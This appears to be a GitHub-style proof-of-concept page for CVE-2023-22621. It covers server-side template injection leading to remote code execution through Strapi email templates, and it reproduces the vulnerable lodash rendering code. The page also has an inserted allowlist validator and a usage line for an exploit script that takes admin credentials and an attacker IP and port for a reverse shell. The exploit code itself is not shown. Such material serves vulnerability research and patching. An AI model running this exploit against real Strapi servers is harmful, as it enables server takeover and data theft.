
CVE-2023-22621 PoC — Strapi Injection Vulnerability

Source
Associated Vulnerability
Title: Strapi Injection Vulnerability (CVE-2023-22621)
Description: Strapi is an open-source content management system (CMS). Strapi versions before 4.5.5 contain a security vulnerability: an attacker can inject a crafted payload that executes code on the server into an email template, bypassing the validation checks that were meant to prevent code execution.
Description
CVE-2023-22621: SSTI to RCE by Exploiting Email Templates affecting Strapi Versions <=4.5.5
Readme
# CVE-2023-22621-POC
CVE-2023-22621: SSTI to RCE by Exploiting Email Templates affecting Strapi Versions <=4.5.5

The function `sendTemplatedEmail` renders email templates into HTML content using the [lodash](https://lodash.com/docs/)
template engine, which evaluates JavaScript code embedded in templates. Ref: https://twitter.com/rootxharsh/status/1268181937127997446?lang=en

```javascript
'use strict';

const _ = require('lodash');

const getProviderSettings = () => {
  return strapi.config.get('plugin.email');
};

const send = async (options) => {
  return strapi.plugin('email').provider.send(options);
};

/**
 * fill subject, text and html using lodash template
 * @param {object} emailOptions - to, from and replyto...
 * @param {object} emailTemplate - object containing attributes to fill
 * @param {object} data - data used to fill the template
 * @returns {{ subject, text, html }}
 */
const sendTemplatedEmail = (emailOptions = {}, emailTemplate = {}, data = {}) => {
  const attributes = ['subject', 'text', 'html'];
  const missingAttributes = _.difference(attributes, Object.keys(emailTemplate));
  if (missingAttributes.length > 0) {
    throw new Error(
      `Following attributes are missing from your email template : ${missingAttributes.join(', ')}`
    );
  }

  // Rendering step (the README snippet was cut off here; completed from the
  // Strapi 4.5 email service): each attribute is compiled with _.template(),
  // which evaluates any <% %> / <%= %> / <%- %> / ${ } directive as JavaScript.
  const templatedAttributes = attributes.reduce(
    (compiled, attribute) =>
      emailTemplate[attribute]
        ? Object.assign(compiled, { [attribute]: _.template(emailTemplate[attribute])(data) })
        : compiled,
    {}
  );

  return strapi.plugin('email').provider.send({ ...emailOptions, ...templatedAttributes });
};

module.exports = () => ({
  getProviderSettings,
  send,
  sendTemplatedEmail,
});
```
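As an added example (not part of the original README or of Strapi's code), a defensive alternative to handing a template to `_.template`: an allowlist validator that accepts only `<%= NAME %>` placeholders for an assumed set of variable names and renders by lookup alone, so the evaluate, interpolate and `${ }` forms lodash would execute are rejected before anything is rendered. The variable names and sample templates are constructed for this example.

```javascript
'use strict';
// Added example, not Strapi's own code: an allowlist-based email-template
// validator and renderer that never passes the template to a code-evaluating
// engine such as lodash's _.template. Variable names and samples are assumed.

// Placeholders a template is permitted to use (assumed names for this example).
const ALLOWED_VARS = new Set(['USER.username', 'USER.email', 'URL', 'CODE', 'TOKEN']);

// Every delimiter _.template treats specially: <% code %> (evaluate),
// <%- expr %> (interpolate), <%= expr %> (escape) and ES-style ${ expr }.
const DIRECTIVE_RE = /<%[-=]?[\s\S]*?%>|\$\{[\s\S]*?\}/g;
// The only form accepted: <%= NAME %> with NAME a dotted identifier.
const SAFE_PLACEHOLDER_RE = /^<%=\s*([A-Za-z_][\w.]*)\s*%>$/;

// Returns every directive that is not a plain allowlisted placeholder.
function findUnsafeDirectives(template) {
  const unsafe = [];
  for (const match of template.match(DIRECTIVE_RE) || []) {
    const m = SAFE_PLACEHOLDER_RE.exec(match);
    if (!m || !ALLOWED_VARS.has(m[1])) unsafe.push(match);
  }
  return unsafe;
}

// HTML-escapes a value before it is placed into the rendered template.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Resolves a dotted path such as "USER.username" against data; missing -> ''.
function lookup(data, path) {
  const value = path.split('.').reduce((obj, key) => (obj == null ? undefined : obj[key]), data);
  return value == null ? '' : value;
}

// Rejects templates carrying code, then substitutes placeholders by lookup only.
function renderSafely(template, data) {
  const unsafe = findUnsafeDirectives(template);
  if (unsafe.length > 0) {
    throw new Error(`Template contains disallowed directives: ${unsafe.join(', ')}`);
  }
  return template.replace(DIRECTIVE_RE, (match) =>
    escapeHtml(lookup(data, SAFE_PLACEHOLDER_RE.exec(match)[1]))
  );
}
```

Run `findUnsafeDirectives` on a template at save time and again before rendering; anything it returns is a template that should be rejected and logged, not rendered.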

![POC](https://cdn.discordapp.com/attachments/1028021191568535623/1100454965555761163/poc3.gif)


## Usage
`python3 CVE-2023-22621.py -url http://strapi.local:1337/ -u "admin@strapi.local" -p "$Securep4ss" -ip 127.0.0.1 -port 4545`
```
options:
  -h, --help            show this help message and exit
  -url URL              URL of the Strapi instance
  -u U                  Admin username
  -p P                  Admin password
  -ip IP                Attacker IP
  -port PORT            Attacker port
  -url_redirect         URL to redirect after email confirmation
  -custom CUSTOM        Custom shell command to execute
```

# Credits
All credit goes to the original vulnerability [finder](https://twitter.com/GhostCcamm); check out his awesome write-up [here](https://www.ghostccamm.com/blog/multi_strapi_vulns/index.html#detecting-remote-code-execution-cve-2023-22621).
File Snapshot

[4.0K] /data/pocs/ef5a656d85ce9796bce1a71ca93f6a4d14b9f812
├── [4.4K] poc.py
└── [2.1K] README.md

0 directories, 2 files